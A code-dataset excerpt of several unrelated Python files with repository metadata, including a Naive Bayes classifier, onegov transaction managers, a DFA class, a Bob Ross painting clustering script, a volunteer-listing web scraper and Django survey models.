masks = [y == i for i in range(len(self.class_log_prior))]
masked_xs = [x[mask] for mask in masks]
feature_counts = np.array([np.asarray(masked_x.sum(0))[0] for masked_x in masked_xs])
smoothed_fc = feature_counts + self.alpha
self.feature_log_prob = np.log(smoothed_fc / smoothed_fc.sum(1, keepdims=True))
return self
def _predict(self, x):
""" Internal method for calculating (linear) predictions
Parameters
----------
x : {np.ndarray of float, scipy.sparse.csr.csr_matrix of float}
One-Hot encoded feature vectors
Returns
-------
predictions : np.ndarray of float
Returns (linear) predictions.
"""
return x.dot(self.feature_log_prob.T) + self.class_log_prior
def predict(self, x):
""" API for calculating (linear) predictions
Parameters
----------
x : {list of float, np.ndarray of float}
Target feature vectors
Returns
-------
predictions : np.ndarray of float
Returns (linear) predictions.
"""
if self.enc is not None:
x = self.enc.transform(x)
return self._predict(x)
def predict_class(self, x):
""" API for predicting labels
Parameters
----------
x : {list of float, np.ndarray of float}
Target feature vectors
Returns
-------
labels : np.ndarray of int
Returns labels.
"""
return np.argmax(self.predict(x), 1)
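if __name__ == "__main__":
    # Minimal smoke test (an illustrative addition, not part of the original file):
    x = np.random.randint(0, 10, [200, 8])  # discrete feature vectors
    y = np.random.randint(0, 4, 200)        # labels
    nb = MultinomialNB().fit(x, y)
    print(nb.predict_class(x)[:10])         # predicted labels for first 10 rows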
| 29.296 | 96 | 0.560896 |
18a994a759d85007cf88e43e5353bf80d7ac9a5c
| 3,055 |
py
|
Python
|
src/onegov/core/datamanager.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/core/datamanager.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/core/datamanager.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import os
import tempfile
import transaction
from onegov.core import log
from onegov.core.utils import safe_move
class MailDataManager(object):
""" Takes a postman and an envelope and sends it when the transaction
is commited.
Since we can't really know if a mail can be sent until it happens, we
simply log an exception if the sending failed.
"""
transaction_manager = transaction.manager
def __init__(self, postman, envelope):
self.postman = postman
self.envelope = envelope
@classmethod
def send_email(cls, postman, envelope):
transaction.get().join(cls(postman, envelope))
def sortKey(self):
return 'mails'
def bind_connection(self, transaction, connection):
assert 'mail_connection' not in transaction.extension
def after_commit_hook(*args):
connection.quit()
transaction.addAfterCommitHook(after_commit_hook)
transaction.extension['mail_connection'] = connection
def open_connection(self):
connection = self.postman.transport(
self.postman.host,
self.postman.port,
**self.postman.options
)
connection.ehlo()
for item in self.postman.middlewares:
item(connection)
return connection
def commit(self, transaction):
if 'mail_connection' not in transaction.extension:
self.bind_connection(transaction, self.open_connection())
try:
self.postman.deliver(
transaction.extension['mail_connection'],
self.envelope
)
except Exception:
log.exception("Failed to send e-mail")
def abort(self, transaction):
pass
def tpc_vote(self, transaction):
pass
def tpc_abort(self, transaction):
pass
def tpc_begin(self, transaction):
pass
def tpc_finish(self, transaction):
pass
class FileDataManager(object):
""" Writes a file when the transaction is commited. """
transaction_manager = transaction.manager
def __init__(self, data, path):
self.data = data
self.path = path
@classmethod
def write_file(cls, data, path):
transaction.get().join(cls(data, path))
def sortKey(self):
return 'files'
def commit(self, transaction):
with tempfile.NamedTemporaryFile(delete=False) as temp:
self.tempfn = temp.name
temp.write(self.data)
def abort(self, transaction):
pass
def tpc_vote(self, transaction):
if not os.path.exists(self.tempfn):
raise ValueError('%s doesnt exist' % self.tempfn)
if os.path.exists(self.path):
raise ValueError('file already exists')
def tpc_abort(self, transaction):
try:
os.remove(self.tempfn)
except OSError:
pass
def tpc_begin(self, transaction):
pass
def tpc_finish(self, transaction):
safe_move(self.tempfn, self.path)
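if __name__ == '__main__':
    # Illustrative sketch (an addition, not part of the original module):
    # queue a file write that only lands on disk when the transaction commits.
    # Assumes '/tmp/onegov-example.txt' does not exist yet (tpc_vote checks this).
    FileDataManager.write_file(b'hello world', '/tmp/onegov-example.txt')
    transaction.commit()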
| 24.637097 | 73 | 0.629133 |
18ad36444d5128007b08506ac3f31875adc10b4d
| 127 |
py
|
Python
|
books/SystemProgramming/ch4_advanced/echo_command.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/SystemProgramming/ch4_advanced/echo_command.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/SystemProgramming/ch4_advanced/echo_command.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
from subprocess import Popen, PIPE
cmd = "echo hello world"
p = Popen(cmd, shell=True, stdout=PIPE)
out, err = p.communicate()
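# Illustrative addition: show the captured stdout (decoded from bytes).
print(out.decode().strip())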
| 25.4 | 39 | 0.724409 |
18d67d5d9fabdd711ac5fef81a528edb66bc9e9b
| 136 |
py
|
Python
|
lms_python/lms_app/admin.py
|
gabrielmdsantos/LMSBD
|
dff3001a560f8cccb938957bf2d5732d4ae3d163
|
[
"Apache-2.0"
] | null | null | null |
lms_python/lms_app/admin.py
|
gabrielmdsantos/LMSBD
|
dff3001a560f8cccb938957bf2d5732d4ae3d163
|
[
"Apache-2.0"
] | null | null | null |
lms_python/lms_app/admin.py
|
gabrielmdsantos/LMSBD
|
dff3001a560f8cccb938957bf2d5732d4ae3d163
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
from lms_app.models import Professor
admin.site.register(Professor)
# Register your models here.
| 22.666667 | 37 | 0.794118 |
18ea8109933fbbfe2b0922e33bce91ae934e86e1
| 2,010 |
py
|
Python
|
StateTracing/tester_helper.py
|
junchenfeng/diagnosis_tracing
|
4e26e2ad0c7abc547f22774b6c9c299999a152c3
|
[
"MIT"
] | null | null | null |
StateTracing/tester_helper.py
|
junchenfeng/diagnosis_tracing
|
4e26e2ad0c7abc547f22774b6c9c299999a152c3
|
[
"MIT"
] | null | null | null |
StateTracing/tester_helper.py
|
junchenfeng/diagnosis_tracing
|
4e26e2ad0c7abc547f22774b6c9c299999a152c3
|
[
"MIT"
] | 1 |
2020-09-08T13:42:16.000Z
|
2020-09-08T13:42:16.000Z
|
# -*- coding: utf-8 -*-
import numpy as np
from torch import load as Tload
from torch import tensor
from dataloader import load_init
from cdkt import CDKT
if 'model' not in dir():
model = CDKT()
model.load_state_dict(Tload('model.pkl'))
#
inits = load_init()
data = """0 506123310064654031030450460312100605
0 506123310064654031230450460312100605
0 506123310064654031231450460312100605
0 506123310064654031231456460312100605
0 506123310064654031231456460312100645
0 506123310564654031231456460312100645
0 506123310564654231231456460312100645
0 506123310564654231231456460312100605
0 506123310564654231231456460312100645
0 506123312564654231231456460312100645
0 546123312564654231231456460312100645
0 546123312564654231231456465312100645
0 546123312564654231231456465312120645
0 546123312564654231231456465312123645
1 002163163050030425245001316542000000
1 002163163054030425245001316542000000
1 002163163054030425245001316542000006"""
# 1 002163163054030425245001316542030006
# 1 002163163054030425245001316542000006
# 1 002163163054031425245001316542000006
# 1 002163163054631425245001316542000006
# 1 002163163254631425245001316542000006
# 1 002163163254631425245601316542000006
# 1 002163163254631425245631316542000006
# 1 052163163254631425245631316542000006
# 1 452163163254631425245631316542000006
# 1 452163163254631425245631316542000016
# 1 452163163254631425245631316542000316
# 1 452163163254631425245631316542003316
# 1 452163163254631425245631316542000316
# 1 452163163254631425245631316542500316
# 1 452163163254631425245631316542520316
# 1 452163163254631425245631316542524316"""
data = [d.strip().split() for d in data.split('\n')]
states = [list(map(int,s)) for i,s in data]
states = tensor([states])
out = model.predicts(states)
prds = np.argmax(out[0],axis=2).flatten()*np.array(inits[2])
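# Illustrative addition: inspect the traced state predictions.
print(prds)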
| 35.892857 | 60 | 0.783085 |
36a322147c11bf81187e2fb1867ec7eedebfc053
| 1,663 |
py
|
Python
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 10 |
2020-12-08T20:18:15.000Z
|
2021-06-07T20:00:07.000Z
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 2 |
2021-06-28T03:42:13.000Z
|
2021-06-28T16:53:13.000Z
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 2 |
2021-01-14T19:59:20.000Z
|
2021-06-15T11:53:21.000Z
|
class DFA:
current_state = None
current_letter = None
valid = True
def __init__(
self, name, alphabet, states, delta_function, start_state, final_states
):
self.name = name
self.alphabet = alphabet
self.states = states
self.delta_function = delta_function
self.start_state = start_state
self.final_states = final_states
self.current_state = start_state
def transition_to_state_with_input(self, letter):
if self.valid:
if (self.current_state, letter) not in self.delta_function.keys():
self.valid = False
return
self.current_state = self.delta_function[(self.current_state, letter)]
self.current_letter = letter
else:
return
def in_accept_state(self):
return self.current_state in self.final_states and self.valid
def go_to_initial_state(self):
self.current_letter = None
self.valid = True
self.current_state = self.start_state
    def run_with_word(self, word):
        self.go_to_initial_state()
        for letter in word:
            self.transition_to_state_with_input(letter)
        return self.in_accept_state()
    def run_with_letters(self, word):
        self.go_to_initial_state()
        for letter in word:
            self.run_with_letter(letter)
            if not self.valid:
                return
def run_with_letter(self, letter):
self.transition_to_state_with_input(letter)
return self.current_state
def __len__(self):
return len(self.states)
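if __name__ == "__main__":
    # Illustrative example (an addition, not part of the original file):
    # a DFA over {'a', 'b'} that accepts words with an even number of 'a'.
    delta = {
        ('even', 'a'): 'odd', ('even', 'b'): 'even',
        ('odd', 'a'): 'even', ('odd', 'b'): 'odd',
    }
    dfa = DFA('even-a', {'a', 'b'}, {'even', 'odd'}, delta, 'even', {'even'})
    print(dfa.run_with_word('abab'))  # True: two 'a'
    print(dfa.run_with_word('ab'))    # False: one 'a'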
| 29.175439 | 82 | 0.623572 |
181dd4525734f8cc34fa28f835971bb355463f95
| 516 |
py
|
Python
|
src/removeElement.py
|
ianxin/algorithm
|
22214b6c81bee926f5a1c74c9417b2e7edd3ceed
|
[
"MIT"
] | 2 |
2018-03-13T08:59:14.000Z
|
2018-03-13T08:59:25.000Z
|
src/removeElement.py
|
ianxin/Algorithm
|
22214b6c81bee926f5a1c74c9417b2e7edd3ceed
|
[
"MIT"
] | null | null | null |
src/removeElement.py
|
ianxin/Algorithm
|
22214b6c81bee926f5a1c74c9417b2e7edd3ceed
|
[
"MIT"
] | null | null | null |
"""
@param: A: A list of integers
@param: elem: An integer
@return: The new length after remove
"""
# iterate over the list in reverse order
def removeElement(self, A, elem):
# write your code here
for i in range(len(A)-1,-1,-1):
if A[i] == elem:
A.pop(i)
return len(A)
# iterate over a copy of the list while mutating the original
def removeElement(self, A, elem):
# write your code here
for i in A[:]:
if i == elem:
A.remove(i)
return len(A)
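if __name__ == "__main__":
    # Illustrative check (an addition; `self` is unused, so None suffices):
    print(removeElement(None, [1, 2, 3, 2, 4], 2))  # 3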
| 23.454545 | 40 | 0.484496 |
1878e0fb7794287a25d9e67514272eb4ae4e8c3c
| 148 |
py
|
Python
|
WD/Cwiczenia/rzymskie.py
|
galursa/UWM
|
b7ab4a275662764a91af6c5bc79da0d98177d0ac
|
[
"MIT"
] | 1 |
2020-02-29T14:38:33.000Z
|
2020-02-29T14:38:33.000Z
|
WD/Cwiczenia/rzymskie.py
|
galursa/UWM
|
b7ab4a275662764a91af6c5bc79da0d98177d0ac
|
[
"MIT"
] | null | null | null |
WD/Cwiczenia/rzymskie.py
|
galursa/UWM
|
b7ab4a275662764a91af6c5bc79da0d98177d0ac
|
[
"MIT"
] | null | null | null |
rzymskie={'I':1,'II':2,'III':3,'IV':4,'V':5,'VI':6,'VII':7,'VIII':8}
print(rzymskie)
print('One element of the dictionary: \n')
print(rzymskie['I'])
| 24.666667 | 69 | 0.587838 |
62be0b337ff4bd9e1d305e934c2a552b0ef05ec1
| 791 |
py
|
Python
|
783-minimum-distance-between-bst-nodes/783-minimum-distance-between-bst-nodes.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | 2 |
2021-12-05T14:29:06.000Z
|
2022-01-01T05:46:13.000Z
|
783-minimum-distance-between-bst-nodes/783-minimum-distance-between-bst-nodes.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
783-minimum-distance-between-bst-nodes/783-minimum-distance-between-bst-nodes.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def minDiffInBST(self, root: Optional[TreeNode]) -> int:
output=[]
        queue = [root]
        while queue:
            cur = queue.pop(0)
            output.append(cur.val)
            if cur.left:
                queue.append(cur.left)
            if cur.right:
                queue.append(cur.right)
sorted_output=sorted(output)
diff = sorted_output[1]-sorted_output[0]
for i in range(2,len(sorted_output)):
if sorted_output[i]-sorted_output[i-1]<diff:
diff=sorted_output[i]-sorted_output[i-1]
return diff
| 34.391304 | 60 | 0.558786 |
3d9613c4bf3516cfc004d7af07118d7c31dd361e
| 2,572 |
py
|
Python
|
Uebung10/Aufgabe29.py
|
B0mM3L6000/EiP
|
f68718f95a2d3cde8ead62b6134ac1b5068881a5
|
[
"MIT"
] | 1 |
2018-04-18T19:10:06.000Z
|
2018-04-18T19:10:06.000Z
|
Uebung10/Aufgabe29.py
|
B0mM3L6000/EiP
|
f68718f95a2d3cde8ead62b6134ac1b5068881a5
|
[
"MIT"
] | null | null | null |
Uebung10/Aufgabe29.py
|
B0mM3L6000/EiP
|
f68718f95a2d3cde8ead62b6134ac1b5068881a5
|
[
"MIT"
] | 1 |
2018-04-29T08:48:00.000Z
|
2018-04-29T08:48:00.000Z
|
class Encoder:
def __init__(self, encoding = {}):
self.encoding = encoding
def updateEncoding(self,string1,string2):
list1 = str.split(string1)
list2 = str.split(string2)
self.encoding = {}
for i in range(len(list1)):
self.encoding[list1[i]] = list2[i]
def encode(self, string):
encodedstring = ""
toencode = str.split(string)
for i in range(len(toencode)):
encodedstring += self.encoding[toencode[i]] + " "
return encodedstring
def decode(self, string):
decodedic = {}
for key in self.encoding:
decodedic[self.encoding[key]] = key
decodedstring = ""
todecode = str.split(string)
for i in range(len(todecode)):
decodedstring += decodedic[todecode[i]] + " "
return decodedstring
##################################
"""
29.5:
nein es gilt nicht, wenn z.B. das Dictionary für verschiedene schlüssel gleiche
Bedeutungen hat
z.B. dict erstellt mit den strings:
"haus baum welt"
"rot blau blau"
und übersetzt werden soll:
"baum welt haus"
dann erhält man am ende: "welt welt haus"
"""
#####################################
# source footer:
from random import randint
try:
#Create an Encoder object
enc = Encoder()
# Create two strings
st1 = "Lorem ipsum dolor sit amet consetetur sadipscing elitr sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat voluptua"
st2 = "At vero eos at accusam sit justo duo dolores et ea rebum Stet clita kasd gubergren no sea takimata sanctus est Lorem ipsum"
# set the dictionary
enc.updateEncoding(st1,st2)
# create a random sentence from words of the first sentence
bagOfWords = str.split(st1)
st3 = ""
for i in range(19):
st3 += bagOfWords[randint(0,len(bagOfWords)-1)]+" "
st3 += bagOfWords[1]
# encode the random sentence
st4 = enc.encode(st3)
# decode it
st5 = enc.decode(st4)
# print the random sentence
print("#Encode String:",st3)
# print the encoded sentence
print("#Decode String:",st4)
# print the decoded sentence
print("#Result:",st5)
# in this case: if the random and the decoded sentence are equal, the test is passed
if(str.split(st3) == str.split(st5)):
print("correct")
else:
print("Encoding or Decoding incorrect")
print("Line #Encode String: and Line #Result: should be equal")
except:
print("Some names or functions do not work correctly or are wrongly named")
| 28.263736 | 154 | 0.626361 |
9a969dcb4bdc1a8eee56b110c60c1611472a3520
| 1,834 |
py
|
Python
|
bob-ross/cluster-paintings.py
|
h4ckfu/data
|
bdc02fd5051dfb31e42f8e078832ceead92f9958
|
[
"CC-BY-4.0"
] | 16,124 |
2015-01-01T06:18:12.000Z
|
2022-03-31T00:46:52.000Z
|
bob-ross/cluster-paintings.py
|
h4ckfu/data
|
bdc02fd5051dfb31e42f8e078832ceead92f9958
|
[
"CC-BY-4.0"
] | 179 |
2015-01-07T10:19:57.000Z
|
2022-02-21T21:19:14.000Z
|
bob-ross/cluster-paintings.py
|
h4ckfu/data
|
bdc02fd5051dfb31e42f8e078832ceead92f9958
|
[
"CC-BY-4.0"
] | 12,163 |
2015-01-03T14:23:36.000Z
|
2022-03-31T10:10:23.000Z
|
"""
Clusters Bob Ross paintings by features.
By Walter Hickey <[email protected]>
See http://fivethirtyeight.com/features/a-statistical-analysis-of-the-work-of-bob-ross/
"""
import numpy as np
from scipy.cluster.vq import vq, kmeans, whiten
import math
import csv
def main():
# load data into vectors of 1s and 0s for each tag
with open('elements-by-episode.csv','r') as csvfile:
reader = csv.reader(csvfile)
        next(reader)  # skip header
data = []
for row in reader:
            data.append([int(x) for x in row[2:]])  # exclude EPISODE and TITLE columns
# convert to numpy matrix
matrix = np.array(data)
# remove colums that have been tagged less than 5 times
columns_to_remove = []
for col in range(np.shape(matrix)[1]):
if sum(matrix[:,col]) <= 5:
columns_to_remove.append(col)
matrix = np.delete(matrix, columns_to_remove, axis=1)
# normalize according to stddev
whitened = whiten(matrix)
output = kmeans(whitened, 10)
print "episode", "distance", "cluster"
# determine distance between each of 403 vectors and each centroid, find closest neighbor
for i, v in enumerate(whitened):
# distance between centroid 0 and feature vector
distance = math.sqrt(sum((v - output[0][0]) ** 2))
# group is the centroid it is closest to so far, set initally to centroid 0
group = 0
closest_match = (distance, group)
# test the vector i against the 10 centroids, find nearest neighbor
for x in range (0, 10):
dist_x = math.sqrt(sum((v - output[0][x]) ** 2))
if dist_x < closest_match[0]:
closest_match = (dist_x, x)
        print(i + 1, closest_match[0], closest_match[1])
if __name__ == "__main__":
main()
| 31.084746 | 93 | 0.640676 |
49806a87d676d3fa46db3e3b6f5f01048f4d408e
| 5,142 |
py
|
Python
|
etl/data_extraction/scrapers/sozialeinsatz.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 7 |
2020-04-23T20:16:11.000Z
|
2022-01-04T14:57:16.000Z
|
etl/data_extraction/scrapers/sozialeinsatz.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 361 |
2020-04-23T17:20:14.000Z
|
2022-03-02T11:29:45.000Z
|
etl/data_extraction/scrapers/sozialeinsatz.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 1 |
2021-11-29T06:02:52.000Z
|
2021-11-29T06:02:52.000Z
|
import math
import re
from data_extraction.scraper import Scraper
class SozialeinsatzScraper(Scraper):
"""Scrapes the website www.sozialeinsatz.de."""
base_url = 'https://www.sozialeinsatz.de'
debug = True
def parse(self, response, url):
"""Handles the soupified response of a detail page in the predefined way and returns it"""
self.logger.debug('parse()')
content = response.find('div', {'id': 'content'})
title = content.find('h2')
if title.text == 'Error 404':
return None
task = content.find('h2', string=re.compile(r'Stellenbeschreibung.*')).findNext('p')
organization = title.findNext('div', {'class': 'row'}).find('p')
contact = content.find('h2', string=re.compile(r'Ansprechpartner.*')).findNext('p')
details = content.find('h2', string=re.compile(r'Details.*')).findNext('p')
category_string = details.find('strong', string=re.compile(r'Aufgaben.*')).nextSibling
categories = [x.strip() for x in category_string.split(',')]
categories.append(title.find('acronym')['title'])
timing = details.find('strong', string=re.compile(r'Zeitraum.*')).nextSibling
location = None
location_p = content.find('h2', string=re.compile(r'Einsatzort.*')).findNext('p')
if location_p.a is not None and 'q=' in location_p.a['href']:
location = location_p.a['href'].split('q=')[1]
zipcode = None
if location is not None:
if len(re.findall(r'(\d{5})', location)) > 0:
zipcode = re.findall(r'(\d{5})', location)[0]
parsed_object = {
'title': title.text.strip(),
'categories': categories,
'location': location,
'task': task.decode_contents().strip(),
'target_group': None,
'prerequisites': None,
'language_skills': None,
'timing': timing.strip(),
'effort': None,
'opportunities': None,
'organization': organization.decode_contents().strip() if organization is not None else None,
'contact': contact.decode_contents().strip() if contact is not None else None,
'link': url or None,
'source': 'www.sozialeinsatz.de',
'geo_location': None,
}
parsed_object['post_struct'] = {
'title': parsed_object['title'],
'categories': parsed_object['categories'],
'location': {
'country': 'Deutschland',
'zipcode': zipcode,
'city': None,
'street': None,
},
'task': None,
'target_group': None,
'prerequisites': parsed_object['prerequisites'],
'language_skills': parsed_object['language_skills'],
'timing': parsed_object['timing'],
'effort': None,
'opportunities': None,
'organization': None,
'contact': None,
'link': parsed_object['link'],
'source': parsed_object['source'],
'geo_location': parsed_object['geo_location'],
}
return parsed_object
def add_urls(self):
"""Adds all URLs of detail pages, found on the search pages, for the crawl function to scrape"""
self.logger.debug('add_urls()')
import time
index = 1
index_max = None
search_page_url = f'{self.base_url}/stellenangebote/finden?Stellenangebot_page={index}'
next_page_url = search_page_url
while next_page_url:
response = self.soupify(next_page_url)
# Get tags of individual results
detail_a_tags = response.findAll('a', {'class': 'morelink'})
# Get maximum number of pages
if index_max is None:
summary_text = response.find('div', {'class': 'summary'}).text
entries = int(re.findall(r'(\d+).?$', summary_text)[0])
index_max = math.ceil(entries / 25.0)
self.logger.debug(f'Fetched {len(detail_a_tags)} URLs from {next_page_url} [{index}/{index_max}]')
self.update_fetching_progress(index, index_max)
# Iterate links and add, if not already found
for link_tag in detail_a_tags:
current_link = self.base_url + link_tag['href']
if current_link in self.urls:
self.logger.debug(f'func: add_urls, page_index: {index},'
f' search_page: {search_page_url}, '
f'duplicate_index: {current_link}, '
f'duplicate_index: {self.urls.index(current_link)}')
else:
self.urls.append(current_link)
# Get next result page
if index < index_max:
index += 1
next_page_url = f'{self.base_url}/stellenangebote/finden?Stellenangebot_page={index}'
else:
next_page_url = None
time.sleep(self.delay)
| 36.992806 | 110 | 0.556593 |
62592611062846e8ddc9453d08b3f9cc749f88fa
| 129 |
py
|
Python
|
Python/Courses/Python-Tutorials.Telusko/02.Miscellaneous/20.03-File-handling.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/02.Miscellaneous/20.03-File-handling.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/02.Miscellaneous/20.03-File-handling.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
file = open("text.txt", "r")
file2 = open("text2.txt", "w")
for data in file:
file2.write(data)
file.close()
file2.close()
| 14.333333 | 30 | 0.620155 |
b832db34004caeef160a328496546197b3b692d7
| 1,764 |
py
|
Python
|
SurveyManager/survey/models.py
|
javiervar/SurveyManager
|
bbe2ed356654c32586c587f58c609c8ce014e96b
|
[
"MIT"
] | null | null | null |
SurveyManager/survey/models.py
|
javiervar/SurveyManager
|
bbe2ed356654c32586c587f58c609c8ce014e96b
|
[
"MIT"
] | null | null | null |
SurveyManager/survey/models.py
|
javiervar/SurveyManager
|
bbe2ed356654c32586c587f58c609c8ce014e96b
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Encuesta(models.Model):
nombre=models.CharField(max_length=150)
descripcion=models.TextField()
estructura=models.TextField()
fecha = models.DateTimeField(auto_now_add=True)
def __str__(self):
return str(self.nombre)
class Pregunta(models.Model):
descripcion=models.CharField(max_length=150)
encuesta = models.ForeignKey('Encuesta', on_delete=models.CASCADE)
tipo=models.IntegerField(null=True)
numero=models.IntegerField(default=1)
json_id=models.CharField(max_length=50,null=True)
def __str__(self):
return str(self.descripcion)
class Respuesta(models.Model):
valor=models.CharField(max_length=150)
pregunta = models.ForeignKey('Pregunta', on_delete=models.CASCADE)
json_id=models.CharField(max_length=50,null=True)
def __str__(self):
return str(self.valor)
class Carrera(models.Model):
nombre=models.CharField(max_length=150)
generacion = models.ForeignKey('Generacion', on_delete=models.CASCADE,null=True,blank=True)
def __str__(self):
return "%s %s" % (self.nombre, self.generacion)
class Generacion(models.Model):
generacion=models.CharField(max_length=150,null=True,blank=True)
def __str__(self):
return str(self.generacion)
class Alumno(models.Model):
email=models.CharField(max_length=100)
nombre=models.CharField(max_length=100)
apellidos=models.CharField(max_length=100)
carrera = models.ForeignKey('Carrera', on_delete=models.CASCADE)
def __str__(self):
return str(self.nombre)
class RespuestaPregunta(models.Model):
respuesta = models.ForeignKey('Respuesta', on_delete=models.CASCADE)
pregunta = models.ForeignKey('Pregunta', on_delete=models.CASCADE)
alumno=models.ForeignKey('Alumno',on_delete=models.CASCADE,blank=True,null=True)
| 30.413793 | 92 | 0.786848 |
b87d4232f38a23242d6a6192e497347e1e6d8428
| 141 |
py
|
Python
|
main/ftpServer.py
|
McUtty/FlowerPlan
|
b0998835356e8e10fe53cad447bc559df2ac7175
|
[
"MIT"
] | null | null | null |
main/ftpServer.py
|
McUtty/FlowerPlan
|
b0998835356e8e10fe53cad447bc559df2ac7175
|
[
"MIT"
] | null | null | null |
main/ftpServer.py
|
McUtty/FlowerPlan
|
b0998835356e8e10fe53cad447bc559df2ac7175
|
[
"MIT"
] | null | null | null |
import uftpd
uftpd.stop()
# uftpd.start([port = 21][, verbose = 1])
uftpd.restart()
# query the installed version
# if a newer one exists - download the files
| 12.818182 | 41 | 0.687943 |
b25e6638db74f47962fb3638fca683037c34ed82
| 3,837 |
py
|
Python
|
src/onegov/people/models/membership.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/people/models/membership.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/people/models/membership.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.orm import Base
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.mixins import UTCPublicationMixin
from onegov.core.orm.types import UUID
from onegov.search import ORMSearchable
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy.orm import backref
from sqlalchemy.orm import object_session
from sqlalchemy.orm import relationship
from uuid import uuid4
class AgencyMembership(Base, ContentMixin, TimestampMixin, ORMSearchable,
UTCPublicationMixin):
""" A membership to an agency. """
__tablename__ = 'agency_memberships'
#: the type of the item, this can be used to create custom polymorphic
#: subclasses of this class. See
#: `<http://docs.sqlalchemy.org/en/improve_toc/\
#: orm/extensions/declarative/inheritance.html>`_.
type = Column(Text, nullable=True)
__mapper_args__ = {
'polymorphic_on': type,
'polymorphic_identity': None,
}
es_public = True
es_properties = {
'title': {'type': 'text'},
}
#: the unique id, part of the url
id = Column(UUID, primary_key=True, default=uuid4)
#: the id of the agency
agency_id = Column(
Integer,
ForeignKey('agencies.id'),
nullable=False
)
#: the related agency (which may have any number of memberships)
agency = relationship(
'Agency',
backref=backref(
'memberships',
cascade='all, delete-orphan',
lazy='dynamic',
order_by='AgencyMembership.order_within_agency'
)
)
#: the id of the person
person_id = Column(UUID, ForeignKey('people.id'), nullable=False)
#: the related person (which may have any number of memberships)
person = relationship(
'Person',
backref=backref(
'memberships',
cascade='all, delete-orphan',
lazy='dynamic',
)
)
#: the position of the membership within the agency
order_within_agency = Column(Integer, nullable=False)
#: the position of the membership within all memberships of a person
order_within_person = Column(Integer, nullable=False)
#: describes the membership
title = Column(Text, nullable=False)
#: when the membership started
since = Column(Text, nullable=True)
@property
def siblings_by_agency(self):
""" Returns a query that includes all siblings by agency, including the item
itself ordered by `order_within_agency`.
"""
query = object_session(self).query(self.__class__)
query = query.order_by(self.__class__.order_within_agency)
query = query.filter(self.__class__.agency == self.agency)
return query
@property
def siblings_by_person(self):
""" Returns a query that includes all siblings by person, including the item
itself ordered by `order_within_person`.
"""
query = object_session(self).query(self.__class__)
query = query.order_by(self.__class__.order_within_person)
query = query.filter(self.__class__.person == self.person)
return query
def vcard(self, exclude=None):
""" Returns the person as vCard (3.0).
Allows to specify the included attributes, provides a reasonable
default if none are specified. Always includes the first and last
name.
"""
if not self.person:
return ''
result = self.person.vcard_object(exclude, include_memberships=False)
line = result.add('org')
line.value = [f"{self.agency.title}, {self.title}"]
line.charset_param = 'utf-8'
return result.serialize()
| 31.195122 | 84 | 0.661194 |
a2a95220c05c2685607d88d70a06cedd80129fc1
| 2,489 |
py
|
Python
|
CareerTinderServer/CareerTinder/migrations/0002_auto_20160918_0011.py
|
sarojaerabelli/HVGS
|
86ec3d2de496540ca439c40f4a0c58c47aa181cf
|
[
"MIT"
] | 1 |
2016-09-18T16:40:27.000Z
|
2016-09-18T16:40:27.000Z
|
CareerTinderServer/CareerTinder/migrations/0002_auto_20160918_0011.py
|
sarojaerabelli/HVGS
|
86ec3d2de496540ca439c40f4a0c58c47aa181cf
|
[
"MIT"
] | null | null | null |
CareerTinderServer/CareerTinder/migrations/0002_auto_20160918_0011.py
|
sarojaerabelli/HVGS
|
86ec3d2de496540ca439c40f4a0c58c47aa181cf
|
